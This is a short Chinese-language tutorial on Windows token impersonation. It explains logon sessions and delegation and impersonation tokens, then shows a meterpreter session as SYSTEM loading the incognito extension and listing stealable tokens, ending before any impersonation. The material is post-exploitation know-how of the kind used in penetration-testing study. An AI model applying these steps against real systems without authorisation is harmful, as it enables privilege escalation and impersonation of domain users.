假冒令牌可以假冒一个网络中的另一个用户进行各种操作。令牌包括登录会话的安全信息,如用户身份识别、用户组和用户权限。当一个用户登录windows系统时,他被给定的一个访问令牌作为他认证会话的一部分。例如,一个入侵用户可能需要以域管理员处理一个特定任务,当他用令牌便可假冒域管理员进行工作。
概念:
- sessions (登陆终端会产生)
- windows station (窗口站,每一个进程都会产生)
- desktop (常用的桌面)
- login sessions (不同账号登录产生不同的session,代表不同账号的权限)
tokens简介:
与进程相关联,进程创建时根据login session分配对应token,含有该进程用户账号、组信息、权限信息等。
用户每次登录,产生loginsession分配对应token.
访问资源时提交token进行身份验证,类似web cookie
Delegrate Token : 交互式登录
Impersonate Token : 非交互登录会话
incognito :
独立软件,被集成到 msf 的 meterpreter 中
不用获取账号密码窃取 token 将自己伪装成合法用户
只用于域环境下提权渗透多操作系统
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > ?
meterpreter > list_tokens -h
Usage: list_tokens <list_order_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WORK-PC\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON